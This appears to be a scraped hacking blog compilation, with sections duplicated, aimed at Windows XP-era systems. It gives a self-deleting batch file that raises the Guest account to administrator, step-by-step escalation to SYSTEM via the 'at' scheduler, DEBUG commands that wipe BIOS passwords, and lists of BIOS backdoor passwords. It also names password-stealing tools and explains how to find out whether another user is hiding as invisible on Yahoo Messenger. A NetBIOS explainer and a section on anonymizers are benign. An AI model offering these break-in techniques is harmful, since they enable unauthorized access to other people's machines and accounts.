Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
~ Cheers ~
* Haking "admin" from "user" mode n more
really that is possible !
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
Enjoy
I bet u wanna try ur hands on Ethical Hacking but unaware of Basic NetBios, which stands as a very important aspect. n dis is d best explanation i can offer u, written in much simpler language.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
<\\_MSBROWSE_> 01 G Master Browser
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
Hackers tools a reference ! BEWARE !!
AAh!!
The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.
They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files
Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc
JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger
Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features
Tro messenger
The big Boss , used with Yahoo messenger lets u take over victims Pc
Many more exists,will be disclosing all of them
Even u can contribute
AAh!!
The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.
They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files
Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc
JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger
Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features
Tro messenger
The big Boss , used with Yahoo messenger lets u take over victims Pc
Many more exists,will be disclosing all of them
Even u can contribute
Find who is Invisible on Yahoo messenger
Just go to
http://www.invisible.ir
and enter victims Yahoo! ID… Click go and you are done!
credit : site contributer :
it works !!
Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.
There is this small trick that you can use to find out what the truth is.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:
Find who is Invisible on Yahoo messenger - The Ethical Hacking 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.
Find who is Invisible on Yahoo messenger - The Ethical Hacking
Alternate Method:
Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.
Note:Some people use softwares like buddy spy to check who is invisible.I DONT RECOMMEND you to use such third party softwares as they can expose your Pc to hackers by sending your personal information and can even steal information from your Pc.So avoid such softwares and instead use the simple tricks given above.
If you have any queries or would like to make some useful contribution to this topic feel free to drop a line in the comments section.
Just go to
http://www.invisible.ir
and enter victims Yahoo! ID… Click go and you are done!
credit : site contributer :
it works !!
Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.
There is this small trick that you can use to find out what the truth is.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:
Find who is Invisible on Yahoo messenger - The Ethical Hacking 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.
Find who is Invisible on Yahoo messenger - The Ethical Hacking
Alternate Method:
Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.
Note:Some people use softwares like buddy spy to check who is invisible.I DONT RECOMMEND you to use such third party softwares as they can expose your Pc to hackers by sending your personal information and can even steal information from your Pc.So avoid such softwares and instead use the simple tricks given above.
If you have any queries or would like to make some useful contribution to this topic feel free to drop a line in the comments section.
Anonymizers and Remailers !! What n How
Anonymizers are online services that eliminate the trail of information that you leave behind, whilst surfing, so that your online activities cannot be traced back to you. The anonymizers vary in sophistication depending on the level of security and number of features that you require. Some anonymizers require the use of client software and others only require that you log onto their website before browsing other sites*.
How do Anonymizers work?
You essentially surf the Web through the anonymizer site, going to that site first and then routing all your pages from there. When you send a page request through the anonymizer, it acts like a super-proxy server, stripping off the header of each data packet, thus making your request anonymous. The requested page is then fed through the anonymizer back to your Web browser**.
In order to avoid being tracked, one can use an anonymous proxy to surf the web. An anonymous proxy makes sure your IP address does not get stored on the web server logs. Web servers log every ?GET? request made, together with date, hour, and IP. But if you are accessing the Internet through a proxy server, then the IP of the proxy is logged and not yours.
In case you do not go through an anonymous proxy, then you are actually risking vital information that belongs to you. For example, a hacker can easily find out your IP Address, your web browser, your Operating System and even the previous URL that you have visited. You can also be easily located geographically (provided one has the necessary software tools) because people can find out a whole lot of things that give your location. Like your hostname, your continent, your country, your city and even your Internet Service Provider.
Consider the scenario where a hacker gets access to your computer, he can find out your name, email address, telephone number, various user ID's and passwords, details about software you use and your preferences, locations of files and folders, the search strings that you used and literally hundreds of other personal things. All this information is stored in files like SYSTEM.ini, USER.dat, SYSTEM.dat etc. One very important file is the nsform??.TMP which stores all the data inside every Netscape form you've ever submitted, with and without SSL, when the submission failed or was cancelled.
What are Re-mailers?
Anonymous Re-mailers are services used to send e-mail messages, so that the recipient of the e-mail cannot determine the identity of the sender. Re-mailers strip off header information leading to the identity of the sender and often route a message through a chain of re-mailers before reaching the recipient. Many re-mailers also include some sort of message based encryption. Re-mailers are commonly used to protect the anonymity if the sender from the recipient, to prevent eavesdropping by a third party, or to post anonymously to newsgroups*.
How do Re-mailers Work?
An anonymous re-mailer is simply a computer connected to the Internet that forwards electronic mail or files to other addresses on the network. It also strips off the "header" part of the messages, which shows where they came from and who sent them. All the receiver can tell about a message's origin is that it passed through the re-mailer. Some re-mailers also allocate each sender an "anonymous ID", rather like a PO Box number, which it stores with the sender's address so that any replies reach them.***
All re-mailers are fairly effective at what they do and some even take an extra step and add encryption to all outgoing messages. In order to view header information sent via email messages in Outlook Express, select a message in your inbox, then select File | Properties | Details.
To view header information in m*c*s*t Outlook, right-click a message in your inbox and select Options; the header information is displayed in the Internet Headers area of the Message Options dialog box.
Anonymous re-mailers were invented by security experts interested to know whether it was possible to send a message on the Internet which could not be traced back to its source. As soon as the first ones were built, though, people found a more pragmatic use for them: to send messages to bulletin boards about subjects so sensitive that they did not want their names known.
Clear BIOS Password, All tricks !
**** New Trick **** :
At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)
A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q
Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.
Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.
Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
